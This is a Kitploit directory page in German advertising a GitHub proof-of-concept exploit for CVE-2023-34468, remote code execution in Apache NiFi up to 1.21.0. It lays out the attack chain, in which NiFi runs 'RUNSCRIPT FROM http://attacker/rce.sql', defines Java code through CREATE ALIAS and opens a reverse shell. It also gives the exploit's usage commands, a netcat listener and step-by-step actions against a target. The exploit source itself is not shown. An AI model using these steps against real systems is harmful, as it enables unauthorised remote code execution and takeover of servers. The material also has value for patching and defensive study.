Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-34468-POC — PoC-Exploit für CVE-2023-34468 — RCE über H2 RUNSCRIPT in Apache NiFi <= 1.21.0 | Kitploit
Tools/GitHubGitHub/0xsoulaimane/cve-2023-34468-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHub0xsoulaimane/cve-2023-34468-poc

CVE-2023-34468-POC

PoC-Exploit für CVE-2023-34468 — RCE über H2 RUNSCRIPT in Apache NiFi <= 1.21.0

Repository anzeigen
42vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Remote Code Execution über H2-Datenbank RUNSCRIPT in Apache NiFi <= 1.21.0


Schwachstelle

Apache NiFi wird standardmäßig mit einem gebündelten H2-Datenbank-JAR ausgeliefert. Der Controller-Service DBCPConnectionPool kann so konfiguriert werden, dass dieser H2-Treiber verwendet wird. H2 unterstützt eine RUNSCRIPT-Anweisung, die eine SQL-Datei von einer entfernten URL abruft und ausführt. Diese SQL-Datei kann beliebigen Java-Code über CREATE ALIAS definieren und ihn auf dem Server-Betriebssystem ausführen.

Angriffskette:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Betroffene Versionen

SoftwareVersion
Apache NiFi<= 1.21.0
Behoben in1.21.1+
JavaBeliebig (gebündelt)

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek → pip install requests
  • NiFi-Ziel mit anonymem Schreibzugriff ODER gültigen Anmeldedaten
  • Netzwerkzugriff vom Ziel zu Ihrem Rechner (für Reverse-Shell-Callback)

Verwendung

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Argumente

ArgumentStandardBeschreibung
--targethttp://NiFi.target.comBasis-URL des NiFi-Ziels
--lhost10.10.10.10Ihre IP (tun0)
--lport4444Port des Reverse-Shell-Listeners
--http-port80Port zum Bereitstellen von rce.sql
--cleanupFalseErstellte Artefakte nach dem Lauf löschen

Einrichtung

Terminal 1 — Listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — Exploit:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

Was der PoC macht

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Tool herunterladen